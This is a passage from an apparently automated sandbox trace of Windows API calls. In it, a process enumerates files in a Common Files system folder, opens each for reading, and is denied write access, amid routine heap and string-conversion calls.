(HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a430 [0089.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x6a430, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll") returned 57 [0089.225] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqloledb.rll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0089.228] GetFileType (hFile=0x27c) returned 0x1 [0089.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0089.228] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0089.228] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0089.228] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0089.228] CloseHandle (hObject=0x27c) returned 1 [0089.228] AreFileApisANSI () returned 1 [0089.228] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0089.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0089.229] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll") returned 57 [0089.229] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\sqloledb.rll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqloledb.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.229] GetLastError () returned 0x5 [0089.229] GetLastError () returned 0x5 [0089.229] SetLastError (dwErrCode=0x5) [0089.229] GetLastError () returned 0x5 [0089.229] SetLastError (dwErrCode=0x5) [0089.229] GetLastError () returned 0x5 [0089.229] SetLastError (dwErrCode=0x5) [0089.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0089.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0089.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0089.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0089.229] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.229] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.229] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43854cb5, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x43854cb5, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x43854cb5, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x4fa00, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="sqlxmlx.dll", cAlternateFileName="")) returned 1 [0089.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0089.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0089.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0089.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0089.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0089.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0089.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0089.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0089.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0089.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0089.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0089.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0089.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0089.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0089.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0089.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0089.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0089.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0089.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0089.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ace8 [0089.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0089.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0089.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0089.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0089.230] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.230] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.230] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.230] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0089.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0089.230] AreFileApisANSI () returned 1 [0089.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.dll", lpUsedDefaultChar=0x0) returned 56 [0089.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0089.230] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.230] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0089.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0089.230] AreFileApisANSI () returned 1 [0089.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0089.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0089.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x76110, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.dll") returned 56 [0089.230] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqlxmlx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0089.231] GetFileType (hFile=0x27c) returned 0x1 [0089.231] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0089.231] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0089.231] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0089.232] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0089.232] CloseHandle (hObject=0x27c) returned 1 [0089.232] AreFileApisANSI () returned 1 [0089.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0089.232] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0089.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x75dc8, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.dll") returned 56 [0089.232] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqlxmlx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.232] GetLastError () returned 0x5 [0089.232] GetLastError () returned 0x5 [0089.232] SetLastError (dwErrCode=0x5) [0089.232] GetLastError () returned 0x5 [0089.232] SetLastError (dwErrCode=0x5) [0089.232] GetLastError () returned 0x5 [0089.232] SetLastError (dwErrCode=0x5) [0089.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0089.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0089.232] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0089.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0089.233] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.233] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.233] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43854cb5, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x43854cb5, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x43854cb5, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="sqlxmlx.rll", cAlternateFileName="")) returned 1 [0089.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0089.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0089.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0089.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0089.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0089.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0089.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0089.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0089.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0089.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0089.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0089.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0089.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0089.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0089.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0089.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0089.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0089.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0089.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0089.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8aeb0 [0089.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0089.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0089.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0089.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0089.233] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.233] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.233] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.233] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0089.233] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0089.233] AreFileApisANSI () returned 1 [0089.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll", lpUsedDefaultChar=0x0) returned 56 [0089.233] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0089.234] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.234] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0089.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0089.234] AreFileApisANSI () returned 1 [0089.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0089.234] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0089.234] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x76110, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll") returned 56 [0089.234] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqlxmlx.rll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0089.276] GetFileType (hFile=0x27c) returned 0x1 [0089.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0089.276] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0089.276] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0089.277] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0089.277] CloseHandle (hObject=0x27c) returned 1 [0089.277] AreFileApisANSI () returned 1 [0089.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0089.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0089.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x75dc8, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll") returned 56 [0089.277] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\sqlxmlx.rll" (normalized: "c:\\program files\\common files\\system\\ole db\\sqlxmlx.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.277] GetLastError () returned 0x5 [0089.277] GetLastError () returned 0x5 [0089.277] SetLastError (dwErrCode=0x5) [0089.277] GetLastError () returned 0x5 [0089.277] SetLastError (dwErrCode=0x5) [0089.278] GetLastError () returned 0x5 [0089.278] SetLastError (dwErrCode=0x5) [0089.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0089.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0089.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0089.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0089.278] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.278] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.278] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x6e, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x6a438, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x6e, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="le", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓਀")) returned 0 [0089.278] FindClose (in: hFindFile=0x78250 | out: hFindFile=0x78250) returned 1 [0089.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0089.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0089.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0089.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0089.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0089.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0089.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0089.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0089.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46438 | out: hHeap=0x20000) returned 1 [0089.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0089.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0089.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0089.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0089.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0089.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0089.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0089.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0089.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0089.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0089.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0089.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0089.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0089.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0089.279] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.279] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.279] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.279] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0089.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0089.279] AreFileApisANSI () returned 1 [0089.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\wab32.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\wab32.dll", lpUsedDefaultChar=0x0) returned 47 [0089.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0089.279] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.279] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.279] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0089.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0089.280] AreFileApisANSI () returned 1 [0089.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0089.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x715b8 [0089.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=47 | out: 